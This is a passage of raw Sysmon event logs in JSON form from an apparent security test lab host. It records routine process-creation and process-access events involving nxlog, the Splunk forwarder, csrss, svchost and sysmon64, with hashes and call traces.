C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.505","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4574,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.568\r\nProcessGuid: {E2A3D6B1-1188-5F25-0000-001018480600}\r\nProcessId: 2980\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.568","ProcessGuid":"{E2A3D6B1-1188-5F25-0000-001018480600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4575,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.568\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1188-5F25-0000-001018480600}\r\nTargetProcessId: 2980\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.568","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1188-5F25-0000-001018480600}","TargetProcessId":"2980","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4576,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.568\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1188-5F25-0000-001018480600}\r\nTargetProcessId: 2980\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.568","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1188-5F25-0000-001018480600}","TargetProcessId":"2980","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4577,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4578,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4579,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4580,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4581,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 